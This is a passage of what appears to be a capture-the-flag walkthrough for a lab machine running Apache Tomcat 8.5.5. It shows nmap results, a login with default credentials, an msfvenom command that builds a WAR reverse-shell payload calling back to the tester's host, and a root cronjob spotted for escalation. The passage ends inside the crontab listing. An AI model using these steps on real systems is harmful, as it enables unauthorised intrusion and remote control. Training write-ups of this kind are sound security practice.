# Nmap 7.92 scan initiated Wed Jan 25 17:21:06 2023 as: nmap -sCV -v -oN init.txt 10.10.19.163 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 fc:05:24:81:98:7e:b8:db:05:92:a6:e7:8e:b0:21:11 (RSA) | 256 60:c8:40:ab:b0:09:84:3d:46:64:61:13:fa:bc:1f:be (ECDSA) |_ 256 b5:52:7e:9c:01:9b:98:0c:73:59:20:35:ee:23:f1:a5 (ED25519) 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) |_ajp-methods: Failed to get a valid response for the OPTION request 8080/tcp open http Apache Tomcat 8.5.5 | http-methods: |_ Supported Methods: GET HEAD POST |_http-title: Apache Tomcat/8.5.5 |_http-open-proxy: Proxy might be redirecting requests |_http-favicon: Apache Tomcat Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Wed Jan 25 17:29:56 2023 -- 1 IP address (1 host up) scanned in 529.87 seconds
Press enter or click to view image in full size
We can see tomcat is running on port 8080. I tried the default credentials from the 403 forbidden page and logged in. Now, we could upload a war file to get a reverse shell.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.17.6.57 LPORT=9999 -f war -o evil.war Payload size: 1102 bytes Final size of war file: 1102 bytes Saved as: evil.war
Press enter or click to view image in full size
In the home directory I found a file id.sh with following content.
cat id.sh #!/bin/bash id > test.txt
There was a cronjob running each minute that would print the output of “id” on test.txt as root.
# /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do.
